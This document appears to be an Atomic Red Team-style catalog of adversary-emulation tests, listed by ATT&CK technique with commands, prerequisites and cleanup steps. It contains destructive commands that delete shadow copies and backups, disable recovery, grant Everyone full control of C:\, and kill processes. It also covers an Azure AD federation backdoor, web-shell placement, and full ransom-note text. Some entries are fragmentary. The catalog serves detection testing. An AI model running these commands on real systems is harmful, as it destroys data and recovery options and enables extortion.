Prereq: Test requrires a file to take ownership of to be located at (%temp%\T1222.001_takeown_folder)
Description: Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied"
is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files"
will be displayed.
Prereq: Test requrires a file to modify to be located at (%temp%\T1222.001_cacls)
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
attrib - Remove read-only attribute
attrib.exe -r %temp%\T1222.001_attrib\*.* /s
Description: Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed.
Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.
Prereq: Test requrires a file to modify to be located at (%temp%\T1222.001_attrib)
Description: Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that
the victim does not see the file.
Cleanup:
del /A:H %temp%\T1222.001_attrib_2\T1222.001_attrib*.txt >nul 2>&1
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Grant Full Access to folder for Everyone - Ryuk Ransomware Style
Description: Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone.
**icacls "C:\*" /grant Everyone:F /T /C /Q**
However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host.
You can set your own path variable to "C:\*" if you prefer.
Prereq: Backup of original folder permissions should exist (for use in cleanup commands)
Description: This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
Description: Changes a file or folder's ownership only recursively using chown.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
chattr - Remove immutable file attribute
chattr -i /var/spool/cron/root
Description: Remove's a file's `immutable` attribute using `chattr`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Description: Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chmod through c script
/tmp/T1222002 /tmp/ T1222002
Description: chmods a file using a c script
Prereq: Compile the script from (T1222.002/src/T1222.002.c). Destination is /tmp/T1222002
gcc T1222.002/src/T1222.002.c -o /tmp/T1222002
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chmod through c script (freebsd)
/tmp/T1222002 /tmp/ T1222002
Description: chmods a file using a c script
Prereq: Compile the script from (T1222.002/src/T1222.002.c). Destination is /tmp/T1222002
cc T1222.002/src/T1222.002.c -o /tmp/T1222002
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chown through c script
sudo /tmp/T1222002own T1222.002/src/chown.c
Description: chowns a file to root using a c script
Prereq: Compile the script from (T1222.002/src/chown.c). Destination is /tmp/T1222002own
gcc T1222.002/src/chown.c -o /tmp/T1222002own
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chown through c script (freebsd)
/tmp/T1222002own T1222.002/src/chown.c
Description: chowns a file to root using a c script
Prereq: Compile the script from (T1222.002/src/chown.c). Destination is /tmp/T1222002own
cc T1222.002/src/chown.c -o /tmp/T1222002own
T1222 - File and Directory Permissions Modification
Enable Local and Remote Symbolic Links via fsutil
fsutil behavior set SymlinkEvaluation R2L:1 fsutil behavior set SymlinkEvaluation R2R:1
Description: Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Cleanup:
fsutil behavior set SymlinkEvaluation R2L:0 fsutil behavior set SymlinkEvaluation R2R:0
T1222 - File and Directory Permissions Modification
Enable Local and Remote Symbolic Links via reg.exe
Description: Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Description: Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Description: Uses the dsquery command to discover domain trusts.
Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
T1482 - Domain Trust Discovery
Windows - Discover domain trusts with nltest
nltest /domain_trusts nltest /trusted_domains
Description: Uses the nltest command to discover domain trusts.
Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
This technique has been used by the Trickbot malware family.
Prereq: nltest.exe from RSAT must be present on disk
Description: Use powershell to enumerate AD information.
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
Prereq: PowerView PowerShell script must exist on disk
if (Test-Path "..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
Prereq: RSAT PowerShell AD admin cmdlets must be installed
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
Description: Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
Description: Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
Prereq: TruffleSnout.exe must exist on disk at specified location (..\ExternalPayloads\TruffleSnout.exe)
if (Test-Path "..\ExternalPayloads\TruffleSnout.exe") {exit 0} else {exit 1}
T1484.001 - Domain Policy Modification: Group Policy Modification
if ($domain.AuthenticationType -eq "Federated") { Write-Host "Error: domain ""contoso.com"" already federated. Try with a different domain or re-create it before." exit 1 }
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential if (-Not $at) { Write-Host "Error: AADInternals could not connect" exit 1 }
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "contoso.com" if ($new) { Write-Host "Federation successfully added to Azure AD" Write-Host $new } else { Write-Host "The federation setup failed" }
Write-Host "End of federation configuration."
Description: Add a new federated domain to Azure AD using PowerShell.
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
1. Open Azure Portal
2. Add a new "custom domain name"
3. Verify the domain by following instructions (i.e. create the requested DNS record)
Prereq: AzureAD and AADInternals Powershell modules must be installed.
Description: Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
Prereq: Secure delete tool from SysInternals must exist on disk at specified location (..\ExternalPayloads\Sdelete\sdelete.exe)
if (Test-Path "..\ExternalPayloads\Sdelete\sdelete.exe") {exit 0} else {exit 1}
Description: Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
T1485 - Data Destruction
Overwrite deleted data on C drive
cipher.exe /w:C:
Description: RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover.
This process is very slow and test execution may timeout.
https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
T1485 - Data Destruction
GCP - Delete Bucket
gcloud config set project atomic-test-1 gcloud storage buckets delete gs://atomic-red-team-bucket
Description: This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
This atomic will create a bucket then delete the bucket.
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Prereq: Check if terraform is installed.
terraform version
Prereq: Create dependency resources using terraform
stat "$T1485/src/T1485-4/terraform.tfstate"
Cleanup:
cd "$T1485/src/T1485-4/" terraform state rm google_storage_bucket.bucket terraform destroy -auto-approve
T1485 - Data Destruction
ESXi - Delete VM Snapshots
echo "" | "..\ExternalPayloads\plink.exe" -batch "atomic.local" -ssh -l root -pw "password" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
Description: Deletes all snapshots for all Virtual Machines on an ESXi Host
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: Attempts to encrypt data on target systems as root to simulate an interruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.
Prereq: Finds where ccencrypt and ccdecrypt are located
Description: building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
Cleanup:
del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
T1486 - Data Encrypted for Impact
Encrypt files using 7z utility - macOS
7z a -p ARTPass -mhe=on ARTArchive.7z ~/test.txt
Description: This test encrypts the file(s) using the 7z utility
Prereq: Check if 7z command exists on the machine
which 7z
Cleanup:
rm ARTArchive.7z
T1486 - Data Encrypted for Impact
Encrypt files using openssl utility - macOS
openssl enc -pbkdf2 -in ~/test.txt -out ARTFile
Description: This test encrypts the file(s) using the openssl utility
Cleanup:
rm ARTFile
T1486 - Data Encrypted for Impact
Data Encrypted with GPG4Win
Set-Content -Path "$env:temp\test.txt" -Value "populating this file with some text" # Create the test.txt file again in case prereqs failed cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"$env:temp\test.txt`""
Description: Gpg4win is a Windows tool (also called Kleopatra which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. It is used by attackers to encrypt disks. User will need to add pass phrase to encrypt file as automation is not allowed under newer versions.
Prereq: GPG must exist at (C:\Program Files (x86)\GnuPG\bin\gpg.exe). If -GetPrereqs fails, try to install GPG4WIN manually at 'https://www.gpg4win.org/download.html'. Once done, run -CheckPrereqs to confirm that it works.
if (test-path 'C:\Program Files (x86)\GnuPG\bin\gpg.exe'){exit 0} else {exit 1}
Description: DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation.
Prereq: dcrypt_setup will be installed at specified location (dcrypt.exe)
if (Test-Path "${env:ProgramFiles}/dcrypt/dcrypt.exe") {exit 0} else {exit 1}
T1486 - Data Encrypted for Impact
Akira Ransomware drop Files with .akira Extension and Ransomnote
1..100 | ForEach-Object { $out = new-object byte[] 1073741; (new-object Random).NextBytes($out); [IO.File]::WriteAllBytes("c:\test.$_.akira", $out) } echo "Hi friends" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "Whatever who you are and what your title is if you' re reading this it means the internal infrastructure of your company is fully or partially dead, all your backups - virtual, physical - everything that we managed to reach - are completely removed. Moreover, we have taken a great amount of your corporate data prior to encryption Well, for now let's keep all the tears and resentment to ourselves and try to build a constructive dialogue. We're fully aware of what damage we caused by locking your internal sources. At the moment. you have to know: " >> $env:Userprofile\Desktop\akira_readme.txt echo "1. Dealing with us you will save A LOT due to we are not interested in ruining your financially. We will study in depth your finance, bank income statements, your savings, investments etc. and present our reasonable demand to you. If you have an active cyber insurance, let us know and we will guide you how to properly use it. Also, dragging out the negotiation process will lead to failing of a deal" >> $env:Userprofile\Desktop\akira_readme.txt echo "2. Paying us you save your TIME, MONEY, EFFORTS and be back on track within 24 hours approximately. Our decryptor works properly on any files or systems, so you will be able to check it by requesting a test decryption service from the beginning of our conversation. [f you decide to recover on your own, keep in mind that you can permanently lose access to some files or accidently corrupt them — in this case we won't be able to help. " >> $env:Userprofile\Desktop\akira_readme.txt echo "3. The security report or the exclusive first-hand information that you will receive upon reaching an agreement is of a great value, since NO full audit of your network will show you the vulnerabilities that we' ve managed to detect and used in order to get into. identify backup solutions and upload your data." >> $env:Userprofile\Desktop\akira_readme.txt echo "4. As for your data, if we fail to agree, we will try to sell personal information/trade secrets/databases/source codes — generally speaking, everything that has a value on the darkmarket - to multiple threat actors at ones." >> $env:Userprofile\Desktop\akira_readme.txt echo "Then all of this will be published in our blog -" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "5. We're more than negotiable and will definitely find the way to settle this quickly and reach an agreement which will satisfy both of us" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
Description: Dropping 100 files with random content and .akira File Extension and the Akira Ransomnote to c:\
Cleanup:
del $env:Userprofile\Desktop\akira_readme.txt del c:\test.*.akira
T1489 - Service Stop
Windows - Stop service using Service Controller
sc.exe stop spooler
Description: Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
started by running the cleanup command.
Cleanup:
sc.exe start spooler >nul 2>&1
T1489 - Service Stop
Windows - Stop service using net.exe
net.exe stop spooler
Description: Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
started by running the cleanup command.
Cleanup:
net.exe start spooler >nul 2>&1
T1489 - Service Stop
Windows - Stop service by killing process
taskkill.exe /f /im spoolsv.exe
Description: Stops a specified service killng the service's process.
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
started by running the cleanup command.
T1489 - Service Stop
Linux - Stop service using systemctl
sudo systemctl stop cron
Description: Stops a specified service using the systemctl command.
Upon execution, if the specified service was running, it will change to a state of inactive and it can be restarted by running the cleanup command.
You can list all available services with following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using killall
sudo killall -SIGTERM cron
Description: Stops a specified service by sending a SIGTERM signal to the linked process using the killall command.
Upon execution, if the service's main process was running, it will be terminated.
If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command.
You can list all available services with following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using kill
sudo kill -SIGTERM $(pgrep cron)
Description: Stops a specified service by sending a SIGTERM signal to the linked process using the kill command. Upon execution, if the service's main process was running, it will be terminated.
If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command.
You can list all available services with following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using pkill
sudo pkill -SIGTERM ^cron$
Description: Stops a specified service by sending a SIGTERM signal to the linked process using pkill. This method is effective when multiple instances of the process may be running.
Upon execution, if any instances of the process were running, they will be terminated. If no instances were running, pkill will not find any processes to kill.
Stopped service can be restarted by running the cleanup command.
You can list all available services with following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Abuse of linux magic system request key for Send a SIGTERM to all processes
echo "e" > /proc/sysrq-trigger
Description: Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
T1490 - Inhibit System Recovery
Windows - Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quiet
Description: Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
Prereq: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
T1490 - Inhibit System Recovery
Windows - Delete Volume Shadow Copies via WMI
wmic.exe shadowcopy delete
Description: Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Prereq: Create volume shadow copy of C:\ .
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
T1490 - Inhibit System Recovery
Windows - wbadmin Delete Windows Backup Catalog
wbadmin delete catalog -quiet
Description: Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
T1490 - Inhibit System Recovery
Windows - Disable Windows Recovery Console Repair
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no
Description: Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
Description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
there may be no output displayed.
Description: Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
T1490 - Inhibit System Recovery
Windows - wbadmin Delete systemstatebackup
wbadmin delete systemstatebackup -keepVersions:0
Description: Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
Description: Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer.
See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
Description: Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
Description: This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
- Deny Generic All (GA) permissions to Network Users (NU)
- Deny GA permissions to Everyone (WD)
- Deny GA permissions to Anonymous (AN)
- Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
- Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
Description: Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
public class Wallpaper{ [DllImport("user32.dll", CharSet=CharSet.Auto)] static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
Description: Downloads an image from a URL and sets it as the desktop wallpaper.
Cleanup:
$updateWallpapercode = @' using System.Runtime.InteropServices; namespace Win32{
public class Wallpaper{ [DllImport("user32.dll", CharSet=CharSet.Auto)] static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption $orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText $newLegalNoticeCaption = "PYSA" $newLegalNoticeText = "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org" Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
Description: Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
[SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection),
[Grief Ransomware](https://redcanary.com/blog/grief-ransomware/),
[Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),
[Pysa Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),
[Spook Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),
[DopplePaymer Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),
[Reedemer Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),
[Kangaroo Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)
$Title = "!!! READ_ME_NOW !!!" $Body = "Your files are SAFE. This is a TEST note for detection validation by bak3n3k0. No data has been encrypted. This simulation exercises detections for: - notepad.exe launched with a ransom-themed text file - creation of a ransom-themed text file in %TEMP% NON-DESTRUCTIVE Atomic Red Team test. "
Description: Creates a temporary ransom-note text file and opens it in Notepad to
simulate ransomware "note display" behavior without making destructive
changes. SAFE and non-destructive.
Description: Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine
Cleanup:
$error.clear()
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment via ioreg
if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
Description: ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
Description: Windows Management Instrumentation(WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as through VMware or VirtualBox.
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment using sysctl (hw.model)
if [ "$(sysctl -n hw.model | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
Description: sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Check if System Integrity Protection is enabled
if [ "$(csrutil status | grep -v 'enabled')" != "" ]; then echo 'Possible Virtualization Environment detected'; fi;
Description: The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed
kernel extension for monitoring purposes the, SIP feature must be disabled to load this kind of kernel extension.
Malware may check if the SIP is enabled.
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment using system_profiler
Description: system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model).
We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain "Mac".
T1497.003 - Time Based Evasion
Delay execution with ping
ping -c 250 8.8.8.8 > /dev/null whoami
Description: Uses the ping command to introduce a delay before executing a malicious payload.
T1505.002 - Server Software Component: Transport Agent
Description: Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.
More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
Prereq: Microsoft Exchange SnapIn must be installed
Description: This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Prereq: Web shell must exist on disk at specified location (T1505.003\src)
if (Test-Path "T1505.003\src") {exit 0} else {exit 1}
Cleanup:
del C:\inetpub\wwwroot\b.jsp /q >nul 2>&1 del C:\inetpub\wwwroot\tests.jsp /q >nul 2>&1 del C:\inetpub\wwwroot\cmd.aspx /q >nul 2>&1
Description: The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed.
This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
A successful execution will install a module into IIS using AppCmd.exe.
[Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe)
[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
Prereq: IIS must be installed in order to add a module to IIS.
$service = get-service w3svc -ErrorAction SilentlyContinue if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
Description: The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed.
This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
A successful execution will install a module into IIS using New-WebGlobalModule.
[Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-webglobalmodule?view=windowsserver2022-ps)
[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
Prereq: IIS must be installed in order to add a module to IIS.
$service = get-service w3svc -ErrorAction SilentlyContinue if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
Description: Simulates patching of termsrv.dll by making a benign change to the file and replacing it with the original afterwards.
Before we can make the modifications we need to take ownership of the file and grant ourselves the necessary permissions.
# Check if the registry key exists if (Test-Path -Path $registryPath) { # Modify the ServiceDll value in the registry Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll" } else { Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists." }
Description: This atomic test simulates the modification of the ServiceDll value in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique may be leveraged by adversaries to establish persistence by loading a patched version of the DLL containing malicious code.
Description: Methods to identify Security Software on an endpoint
when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
and specific security software.
Description: Methods to identify Security Software on an endpoint
when sucessfully executed, powershell is going to processes related AV products if they are running.
Note that, depending on the privilege of current user, get-process | ?{$_.Description -like "*"} may not return the processes related to AV products of the check.
